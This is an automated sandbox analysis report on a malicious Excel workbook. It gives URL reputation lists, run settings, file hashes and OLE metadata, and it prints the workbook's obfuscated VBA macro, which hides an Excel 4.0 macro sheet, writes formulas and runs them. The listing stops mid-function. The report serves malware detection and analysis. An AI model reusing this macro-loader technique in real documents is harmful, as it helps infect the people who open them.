https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://api.aadrm.com0%Avira URL Cloudsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
    high
    https://login.microsoftonline.com/35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
      high
      https://shell.suite.office.com:144335F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
          high
          https://autodiscover-s.outlook.com/35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
            high
            https://roaming.edog.35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
            • URL Reputation: safe
            unknown
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
              high
              https://cdn.entity.35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                    high
                    https://powerlift.acompli.net35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v135F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                      high
                      https://cortana.ai35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                high
                                https://api.aadrm.com/35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                      high
                                      https://cr.office.com35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                        high
                                        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                        • Avira URL Cloud: safe
                                        low
                                        https://portal.office.com/account/?ref=ClientMeControl35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                          high
                                          https://graph.ppe.windows.net35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                            high
                                            https://res.getmicrosoftkey.com/api/redemptionevents35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://powerlift-frontdesk.acompli.net35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://tasks.office.com35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                              high
                                              https://officeci.azurewebsites.net/api/35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/work35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                high
                                                https://store.office.cn/addinstemplate35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://api.aadrm.com35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                  high
                                                  https://globaldisco.crm.dynamics.com35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                    high
                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                      high
                                                      https://store.officeppe.com/addinstemplate35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://dev0-api.acompli.net/autodetect35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.odwebp.svc.ms35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.powerbi.com/v1.0/myorg/groups35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                        high
                                                        https://web.microsoftstream.com/video/35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                          high
                                                          https://graph.windows.net35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                            high
                                                            https://dataservice.o365filtering.com/35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://officesetup.getmicrosoftkey.com35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://analysis.windows.net/powerbi/api35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                              high
                                                              https://prod-global-autodetect.acompli.net/autodetect35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://outlook.office365.com/autodiscover/autodiscover.json35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                high
                                                                https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                  high
                                                                  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                    high
                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                      high
                                                                      https://ncus.contentsync.35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                        high
                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                          high
                                                                          http://weather.service.msn.com/data.aspx35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                            high
                                                                            https://apis.live.net/v5.0/35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                              high
                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                high
                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                  high
                                                                                  https://management.azure.com35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                    high
                                                                                    https://outlook.office365.com35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.com35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                high
                                                                                                https://api.office.net35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                          high
                                                                                                          https://substrate.office.com/search/api/v2/init35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office.com/35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                      high
                                                                                                                      https://substrate.office.com/search/api/v1/SearchHistory35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                        high
                                                                                                                        https://management.azure.com/35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                          high
                                                                                                                          https://login.windows.net/common/oauth2/authorize35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                            high
                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://graph.windows.net/35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                              high
                                                                                                                              https://api.powerbi.com/beta/myorg/imports35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                                high
                                                                                                                                https://devnull.onenote.com35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://ncus.pagecontentsync.35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://messaging.office.com/35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://augloop.office.com/v235F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://skyapi.live.net/Activity/35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://clients.config.office.net/user/v1.0/mac35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://dataservice.o365filtering.com35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://api.cortana.ai35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://onedrive.live.com35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://ovisualuiapp.azurewebsites.net/pbiagave/35F6661B-AEDB-44E3-949D-A83F70583589.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown

                                                                                                                                                Contacted IPs

                                                                                                                                                No contacted IP infos

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                Analysis ID:500395
                                                                                                                                                Start date:12.10.2021
                                                                                                                                                Start time:00:21:11
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 4m 43s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Sample file name:650912 .xls
                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Run name:Potential for more IOCs and behavior
                                                                                                                                                Number of analysed new started processes analysed:15
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal60.bank.expl.winXLS@1/1@0/0
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .xls
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
                                                                                                                                                • Active Picture Object
                                                                                                                                                • Active AutoShape Object
                                                                                                                                                • Scroll down
                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 23.203.141.148, 52.109.88.177, 52.109.76.36, 52.109.88.39, 20.82.210.154, 13.107.4.50, 20.54.110.249, 40.112.88.60, 2.20.178.33, 2.20.178.24, 52.184.81.210
                                                                                                                                                • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, b1ns.c-0001.c-msedge.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, b1ns.au-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, c-0001.c-msedge.net, iris-de-prod-azsc-eas-b.eastasia.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                No simulations

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                No context

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                No context

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\35F6661B-AEDB-44E3-949D-A83F70583589
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):138049
                                                                                                                                                Entropy (8bit):5.359399982820714
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:WcQIKNZrBdA3gBwfnQ9DQW+zBY34Zzi7nXboOidXVE6LWME9:iWQ9DQW+zbXa1
                                                                                                                                                MD5:B999163D9F5ED147B2EE7950DBD3C0D4
                                                                                                                                                SHA1:0059385F2E773D1046E89AF4BAED49FC275341D1
                                                                                                                                                SHA-256:D1CE71F6E0E13E91F64E7D2B147BA4E9D1FDEE48BDE2B7FE1CC4FD73B73A21F7
                                                                                                                                                SHA-512:4BAA051313D905231F5A4E1CB901E6D6CD07868AA8091D45C9B79A82A523D71F2DE7A609B0BD00DCCEE6D5D17C035DE25EFF18B9797A4196C3A71352B376905A
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-10-11T22:22:13">.. Build: 16.0.14604.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Create Time/Date: Mon Oct 11 09:03:47 2021, Last Saved Time/Date: Mon Oct 11 09:03:49 2021, Security: 0, Comments: ''BRT
                                                                                                                                                Entropy (8bit):5.314831852450583
                                                                                                                                                TrID:
                                                                                                                                                • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                File name:650912 .xls
                                                                                                                                                File size:51712
                                                                                                                                                MD5:5b239ac2b45218ad505553d52203c744
                                                                                                                                                SHA1:abefd9905f25fdcea76783cfd877c19206d117ab
                                                                                                                                                SHA256:f3ff9603b23796a30d10ae2cfa0001212752705a3e602371ae74d0f4d8defb71
                                                                                                                                                SHA512:af1bb5477e46cc4ed1177a0b48a6d187b2a45fa68a28291f10466d85816bae8d6ba1ad1579f1b1f6ef4d276ad73efd98cebf4fe7071349769c6a93dc0cbda5fd
                                                                                                                                                SSDEEP:1536:dsQlYkEIbSkKBEqEXPgsRZmbaoFhZhR0cixIHm0THPFDI0LF/yUKAmsiwc:dhlYkEIuPm3fNRZmbaoFhZhR0cixIHmP
                                                                                                                                                File Content Preview:........................>...................................;..................................................................................................................................................................................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                Static OLE Info

                                                                                                                                                General

                                                                                                                                                Document Type:OLE
                                                                                                                                                Number of OLE Files:1

                                                                                                                                                OLE File "650912 .xls"

                                                                                                                                                Indicators

                                                                                                                                                Has Summary Info:True
                                                                                                                                                Application Name:unknown
                                                                                                                                                Encrypted Document:False
                                                                                                                                                Contains Word Document Stream:False
                                                                                                                                                Contains Workbook/Book Stream:True
                                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                Flash Objects Count:
                                                                                                                                                Contains VBA Macros:True

                                                                                                                                                Summary

                                                                                                                                                Code Page:1252
                                                                                                                                                Comments:''BRT
                                                                                                                                                Create Time:2021-10-11 08:03:47.102000
                                                                                                                                                Last Saved Time:2021-10-11 08:03:49
                                                                                                                                                Security:0

                                                                                                                                                Document Summary

                                                                                                                                                Document Code Page:1252
                                                                                                                                                Thumbnail Scaling Desired:False
                                                                                                                                                Company:
                                                                                                                                                Contains Dirty Links:False
                                                                                                                                                Shared Document:False
                                                                                                                                                Changed Hyperlinks:False
                                                                                                                                                Application Version:1048576

                                                                                                                                                Streams with VBA

                                                                                                                                                VBA File Name: Foglio1, Stream Size: 992
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/Foglio1
                                                                                                                                                VBA File Name:Foglio1
                                                                                                                                                Stream Size:992
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 b8 98 9f 83 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Foglio1"
                                                                                                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                Attribute VB_Exposed = True
                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                Attribute VB_Customizable = True
                                                                                                                                                VBA File Name: Questa_cartella_di_lavoro, Stream Size: 6050
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/Questa_cartella_di_lavoro
                                                                                                                                                VBA File Name:Questa_cartella_di_lavoro
                                                                                                                                                Stream Size:6050
                                                                                                                                                Data ASCII:. . . . . . . . . 2 . . . . . . . . . . . ` . . . n . . . b . . . . . . . . . . . . . l . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . F . . . w . K . f . . . . . : . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . ` . . J . . . . . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . ` . . J . . . . . ~ . . . F . . . w . K . f . . . . . : . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 06 00 01 00 00 32 0b 00 00 e4 00 00 00 10 02 00 00 60 0b 00 00 6e 0b 00 00 62 13 00 00 0e 00 00 00 01 00 00 00 b8 98 6c 8d 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 1c 46 db f0 90 77 d1 4b a7 66 e3 9c a9 9f 00 3a 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Questa_cartella_di_lavoro"
                                                                                                                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                Attribute VB_Exposed = True
                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                Attribute VB_Customizable = True
                                                                                                                                                
                                                                                                                                                Function usa_corr()
                                                                                                                                                usa_corr = gesstione & "R" & "I"
                                                                                                                                                End Function
                                                                                                                                                
                                                                                                                                                Function sinto_s(dd As String, i As Integer)
                                                                                                                                                i = r: Sheets(1).[C4].FormulaLocal = dd
                                                                                                                                                End Function
                                                                                                                                                
                                                                                                                                                
                                                                                                                                                
                                                                                                                                                Function cerca_aa()
                                                                                                                                                rom = 7: Sheets(4 - 3).Cells(21, 3).FormulaLocal = usa_corr & diwin
                                                                                                                                                End Function
                                                                                                                                                
                                                                                                                                                
                                                                                                                                                
                                                                                                                                                Sub Ingrand()
                                                                                                                                                di_de = 1
                                                                                                                                                Excel4MacroSheets.Add(Before:=Worksheets((1))).Name = vgiom: ottoB
                                                                                                                                                metodO = a_icona
                                                                                                                                                For Each inn In chiiI
                                                                                                                                                di_de = 5: murals = (sinto_s(gesstione & inn, 1 + di_de)): di_de = 112: Aki ((di_de))
                                                                                                                                                Next
                                                                                                                                                End Sub
                                                                                                                                                
                                                                                                                                                
                                                                                                                                                Function diwin()
                                                                                                                                                diwin = "T" & vgiom & "O" & "()"
                                                                                                                                                End Function
                                                                                                                                                
                                                                                                                                                
                                                                                                                                                Function a_icona()
                                                                                                                                                a_icona = cerca_aa
                                                                                                                                                End Function
                                                                                                                                                
                                                                                                                                                Sub ottoB()
                                                                                                                                                ActiveSheet.Visible = 0
                                                                                                                                                End Sub
                                                                                                                                                Function vgiom() As String
                                                                                                                                                vgiom = tTagils & "RN"
                                                                                                                                                End Function
                                                                                                                                                Sub Aki(w As Long)
                                                                                                                                                numm = w: Run ("" & "C" & 3)
                                                                                                                                                End Sub
                                                                                                                                                Function chiiI() As Variant
                                                                                                                                                For Each B In Ssono(Cells(128, 3), 3)
